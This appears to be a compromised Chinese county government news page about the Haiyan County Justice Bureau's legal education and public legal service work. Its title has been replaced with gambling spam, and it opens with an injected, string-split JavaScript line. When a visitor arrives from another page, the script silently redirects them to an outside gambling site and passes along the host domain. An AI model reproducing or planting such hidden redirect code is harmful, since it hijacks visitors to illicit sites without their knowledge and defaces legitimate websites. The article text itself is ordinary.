var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > 各地信息
发布日期:2019-10-29 浏览次数: 字号:[ ]

海盐县司法局精心做好法治宣传教育工作,秉持法治宣传与法治实践相结合的思路,针对不同任务、不同时期、不同需求开展工作,全面提升法治宣传教育实效。  

一是深入一线,护航经济发展。围绕全县十大战役中心工作,发挥基层法律顾问体系法律引导功能,以群众实际需求为主旨,以群众关注热点为核心,将普法与人民调解、律师公证、法律援助相结合,强化中心工作法治保障。开展法致睦邻、“普法未来星”选拔大赛、“法律明白人”选聘及助力文明创建系列法治宣传广场活动,依托睦邻客厅将法治宣传、人民调解、法律援助、法律服务等工作覆盖至基层。积极邀请全县律师及法律服务工作为企业法律体检、开展法治讲座,帮助企业防范与化解风险,依法解决企业法律纠纷案件,推动企业在法治轨道上健康成长。  

二是融入日常,畅通服务渠道。加强全县公共法律服务体系建设,深入推进县、镇和村社区实体平台规范化建设,调整实体平台功能布局,选用“全科”律师值班,设置公共法律服务自助设备,营造良好法治环境。深入推进法律顾问结村工作,各村法律顾问在法律咨询及服务工作中,结合地方村务、民情向村民渗透法律知识的宣传,为新农村建设营造良好的法治氛围。充分发挥法律援助工作站、村级法律援助联络点等基层援助机构的触角作用,推行“零等待、上门式”等服务举措,畅通特殊人群法律援助绿色通道,群众满意率达100%。  

三是健全举措,满足百姓需求。坚持以群众需求为导向,开展“预约式”“菜单式”“订单式”公共法律服务工作,加强向重点领域、弱势群体、流动人品和特殊人群的产品配送。以张元济图书馆为后盾,综合利用全县图书分馆、农家书屋、法律图书柜的建设情况,开通法律图书巴士流动服务,为基层群众提供便捷的学法用法通道。充分利用“法律服务E群”有效开展村(社区)法律顾问服务,解答微民法律疑问,做好全县各单位、各部门在法治宣传上的工作介绍,传播法律知识,弘扬法治文化,打造群众指尖上的学法工具。优化公证服务,推进“最多跑一次”改革,为群众提供高效、便捷、优质的公证服务。

海盐县局

 




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统